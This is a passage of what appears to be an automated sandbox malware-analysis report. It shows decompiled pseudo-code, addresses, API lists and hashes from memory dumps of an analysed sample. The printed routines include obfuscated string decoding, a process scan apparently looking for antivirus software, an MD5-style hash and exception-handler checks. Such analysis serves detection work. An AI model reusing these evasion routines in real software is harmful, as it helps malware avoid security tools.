								_t54 =  *0x3c4d2a8; // 0xb0a5a8
								_t22 = _t54 + 0x3c4e252; // 0x616d692f
								 *0x3c4d2d4 = _t22;
								goto L60;
							} else {
								_t64 = E03C4A0FD(0, _t53);
								 *0x3c4d2d4 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x3c4d2a4; // 0x69b25f44
										_t56 = E03C49403(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x3c4d2a8; // 0xb0a5a8
										_t23 = _t57 + 0x3c4e791; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E03C4A0FD(0, _t56);
									}
									 *0x3c4d340 = _t58;
									HeapFree( *0x3c4d238, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x03c47fbe
0x03c47fc1
0x03c47fe1
0x03c47fef
0x03c47fef
0x03c47ff4
0x03c4800e
0x03c48276
0x03c4827d
0x03c48284
0x03c48284
0x03c48014
0x03c48030
0x03c48264
0x03c4826e
0x00000000
0x03c48036
0x03c48036
0x03c4803b
0x03c48051
0x03c4803d
0x03c4803d
0x03c4804a
0x03c4804a
0x03c4805b
0x03c4805d
0x03c48067
0x03c4806c
0x03c4806c
0x03c48067
0x03c48073
0x03c48089
0x03c48075
0x03c48075
0x03c48082
0x03c48082
0x03c4808d
0x03c4808f
0x03c48099
0x03c4809e
0x03c4809e
0x03c48099
0x03c480a5
0x03c480bb
0x03c480a7
0x03c480a7
0x03c480b4
0x03c480b4
0x03c480bf
0x03c480c1
0x03c480cb
0x03c480d0
0x03c480d0
0x03c480cb
0x03c480d7
0x03c480ed
0x03c480d9
0x03c480d9
0x03c480e6
0x03c480e6
0x03c480f1
0x03c480f3
0x03c480fd
0x03c48102
0x03c48102
0x03c480fd
0x03c48109
0x03c4811f
0x03c4810b
0x03c4810b
0x03c48118
0x03c48118
0x03c48123
0x03c48125
0x03c4812f
0x03c48134
0x03c48134
0x03c4812f
0x03c4813b
0x03c48151
0x03c4813d
0x03c4813d
0x03c4814a
0x03c4814a
0x03c48155
0x03c48168
0x03c48168
0x00000000
0x03c48157
0x03c48157
0x03c48161
0x00000000
0x03c48172
0x03c48172
0x03c48174
0x03c4818a
0x03c48176
0x03c48176
0x03c48183
0x03c48183
0x03c4818e
0x03c48190
0x03c48193
0x03c48194
0x03c4819b
0x03c4819d
0x03c4819e
0x03c4819e
0x03c4819b
0x03c481a5
0x03c481bb
0x03c481a7
0x03c481a7
0x03c481b4
0x03c481b4
0x03c481bf
0x03c481cd
0x03c481d7
0x03c481d7
0x03c481de
0x03c481f4
0x03c481e0
0x03c481e0
0x03c481ed
0x03c481ed
0x03c481f8
0x03c4820b
0x03c4820b
0x03c48210
0x03c48216
0x00000000
0x03c481fa
0x03c481fd
0x03c48202
0x03c48209
0x03c4821b
0x03c4821d
0x03c48233
0x03c4821f
0x03c4821f
0x03c4822c
0x03c4822c
0x03c48237
0x03c48243
0x03c48248
0x03c48248
0x03c48239
0x03c4823c
0x03c4823c
0x03c48256
0x03c4825b
0x03c48261
0x00000000
0x03c48261
0x00000000
0x03c48209
0x03c481f8
0x03c48161
0x03c48155

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005,03C4D00C,00000008), ref: 03C48063
StrToIntExA.SHLWAPI(00000000,00000000,?,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005,03C4D00C,00000008), ref: 03C48095
StrToIntExA.SHLWAPI(00000000,00000000,?,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005,03C4D00C,00000008), ref: 03C480C7
StrToIntExA.SHLWAPI(00000000,00000000,?,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005,03C4D00C,00000008), ref: 03C480F9
StrToIntExA.SHLWAPI(00000000,00000000,?,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005,03C4D00C,00000008), ref: 03C4812B
StrToIntExA.SHLWAPI(00000000,00000000,?,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005,03C4D00C,00000008), ref: 03C4815D
HeapFree.KERNEL32(00000000,03C430F3,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005,03C4D00C,00000008,?,03C430F3), ref: 03C4825B
HeapFree.KERNEL32(00000000,?,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005,03C4D00C,00000008,?,03C430F3), ref: 03C4826E

Part of subcall function 03C4A0FD: lstrlen.KERNEL32(69B25F44,00000000,7748D3B0,03C430F3,03C48241,00000000,03C430F3,?,69B25F44,?,03C430F3,69B25F44,?,03C430F3,69B25F44,00000005), ref: 03C4A106
Part of subcall function 03C4A0FD: memcpy.NTDLL(00000000,?,00000000,00000001,?,03C430F3), ref: 03C4A129
Part of subcall function 03C4A0FD: memset.NTDLL ref: 03C4A138

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$lstrlenmemcpymemset
String ID:
API String ID: 3442150357-0
Opcode ID: 78a0e7ec8300640012a2b8434399dca93707a0e031c0b5c9edd633c435adaa29
Instruction ID: 0ea5a1525f72c63b527063d207198256e4e3e66c08745dfee162aca4ae146b1e
Opcode Fuzzy Hash: 78a0e7ec8300640012a2b8434399dca93707a0e031c0b5c9edd633c435adaa29
Instruction Fuzzy Hash: 9D816778A10715AFCB21FBB8DD88E5BB7FDDB486007290956E406DB209E737EE419720

Uniqueness

Uniqueness Score: -1.00%

Function 03C48F1B, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E03C48F1B() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x3c4d2a8; // 0xb0a5a8
						_t2 = _t9 + 0x3c4ee34; // 0x73617661
						_push( &_v264);
						if( *0x3c4d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x03c48f26
0x03c48f30
0x03c48f34
0x03c48f3e
0x03c48f6f
0x03c48f45
0x03c48f4a
0x03c48f57
0x03c48f60
0x03c48f77
0x03c48f62
0x03c48f6a
0x00000000
0x03c48f6a
0x03c48f78
0x03c48f79
0x00000000
0x03c48f79
0x00000000
0x03c48f73
0x03c48f7f
0x03c48f84

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03C48F2B
Process32First.KERNEL32(00000000,?), ref: 03C48F3E
Process32Next.KERNEL32(00000000,?), ref: 03C48F6A
CloseHandle.KERNEL32(00000000), ref: 03C48F79

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: d3072f629acc060cac80adce6b896d3e56fcc05ab072e6525eb4e4d065e4bce1
Instruction ID: a7405b4745b4ca31c1651e89a6864fdb6ca748ade9129d91821942a685c69606
Opcode Fuzzy Hash: d3072f629acc060cac80adce6b896d3e56fcc05ab072e6525eb4e4d065e4bce1
Instruction Fuzzy Hash: 60F0BB356013246BFB20F6668C48EEBB66DDBC5710F010191ED06D7104E731DF4586A5

Uniqueness

Uniqueness Score: -1.00%

Function 00401752, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401752() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x4030f0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x4030fc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x4030ec = _t3;
						_t5 = GetCurrentProcessId();
						 *0x4030e8 = _t5;
						 *0x4030f0 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x4030e4 = _t6;
						if(_t6 == 0) {
							 *0x4030e4 =  *0x4030e4 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x00401753
0x00401761
0x00401767
0x0040176e
0x004017c5
0x004017c5
0x00401770
0x00401778
0x00401785
0x00401785
0x004017c1
0x004017c3
0x00000000
0x00000000
0x00000000
0x0040177a
0x00401781
0x00401787
0x00401787
0x0040178c
0x0040179a
0x0040179f
0x004017a5
0x004017ab
0x004017b2
0x004017b4
0x004017b4
0x004017be
0x00401783
0x00401783
0x00000000
0x00401783
0x00401781

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019AC), ref: 00401761
GetVersion.KERNEL32 ref: 00401770
GetCurrentProcessId.KERNEL32 ref: 0040178C
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 004017A5

Memory Dump Source

Source File: 00000000.00000002.516786693.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.516802279.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.516809873.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 239b346ddb4e1af03e74690df84409a47080255b9289a2f171059d4aa852614c
Instruction ID: de110183062e86dcac6d67db381f44f5737484f963d514ed7bd2dcac5e25d41b
Opcode Fuzzy Hash: 239b346ddb4e1af03e74690df84409a47080255b9289a2f171059d4aa852614c
Instruction Fuzzy Hash: BDF01D306813129BE6119F647F19B953B69A705712F108136FA02F62E4E7B58541CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 01FE092B, Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 01FE09DC, 01FE09DF, 01FE09E4
l, xrefs: 01FE0966
., xrefs: 01FE095F

Memory Dump Source

Source File: 00000000.00000002.517164137.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FE0000, based on PE: false

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 646cc898afa46609799561e12719a9a1f74aff13f17f5be4a44d626d16e87637
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: B0316DB6A00609DFDB11CF99C884AADBBF5FF48324F14404AE441A7311DBB2EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 03C4836E, Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E03C4836E(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x03c48371
0x03c4837c
0x03c4837f
0x03c48382
0x03c48383
0x03c483a1
0x03c483a3
0x03c483a6
0x03c483a9
0x03c483a9
0x03c483ac
0x03c483ac
0x03c483af
0x03c483af
0x03c483b2
0x03c483b2
0x03c483cf
0x03c483d2
0x03c483e8
0x03c483eb
0x03c48405
0x03c48408
0x03c4841e
0x03c48421
0x03c48423
0x03c4843b
0x03c4843e
0x03c48441
0x03c48459
0x03c4845c
0x03c48476
0x03c48479
0x03c4848f
0x03c48492
0x03c48494
0x03c484ac
0x03c484b1
0x03c484b4
0x03c484ca
0x03c484cd
0x03c484e7
0x03c484ea
0x03c48500
0x03c48503
0x03c48505
0x03c48520
0x03c48523
0x03c4853a
0x03c4853d
0x03c48541
0x03c4855a
0x03c4855d
0x03c4855f
0x03c48562
0x03c4857d
0x03c48580
0x03c48599
0x03c4859c
0x03c485ac
0x03c485af
0x03c485c7
0x03c485ca
0x03c485e4
0x03c485e7
0x03c485ff
0x03c48602
0x03c48618
0x03c4861b
0x03c48633
0x03c48636
0x03c4864e
0x03c48651
0x03c4866b
0x03c4866e
0x03c48684
0x03c48687
0x03c4869f
0x03c486a2
0x03c486bc
0x03c486bf
0x03c486d7
0x03c486da
0x03c486f0
0x03c486f3
0x03c4870b
0x03c4870e
0x03c48726
0x03c48729
0x03c4873b
0x03c4873e
0x03c48750
0x03c48753
0x03c48765
0x03c48768
0x03c4876c
0x03c4877c
0x03c4877f
0x03c4878d
0x03c48790
0x03c487a2
0x03c487a5
0x03c487b9
0x03c487bc
0x03c487be
0x03c487ce
0x03c487d1
0x03c487e3
0x03c487e6
0x03c487f4
0x03c487f7
0x03c48809
0x03c4880c
0x03c48810
0x03c48820
0x03c48823
0x03c48835
0x03c48838
0x03c48846
0x03c48849
0x03c4885b
0x03c4885e
0x03c48870
0x03c48873
0x03c48887
0x03c4888a
0x03c4889e
0x03c488a1
0x03c488b5
0x03c488b8
0x03c488cc
0x03c488cf
0x03c488e3
0x03c488e6
0x03c488fa
0x03c488ff
0x03c48911
0x03c48914
0x03c48928
0x03c4892b
0x03c4893f
0x03c48942
0x03c48958
0x03c4895b
0x03c4896f
0x03c48972
0x03c48984
0x03c48987
0x03c4899b
0x03c4899e
0x03c489b2
0x03c489b5
0x03c489c9
0x03c489d2
0x03c489d5
0x03c489de
0x03c489e7
0x03c489ef
0x03c489f7
0x03c48a01
0x03c48a16

APIs

memset.NTDLL ref: 03C48A0A

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 9738b88dab78f4f3c55dd3ab68ea444fce282e220e1740be5f8b1eeaded77b95
Instruction ID: 3b5d6a2e2c2222beef28764e3b27d3fc74c064cc892f0285354a940b9f6b6c2d
Opcode Fuzzy Hash: 9738b88dab78f4f3c55dd3ab68ea444fce282e220e1740be5f8b1eeaded77b95
Instruction Fuzzy Hash: C222847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 03C4B1E5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C4B1E5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x3c4d2e0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
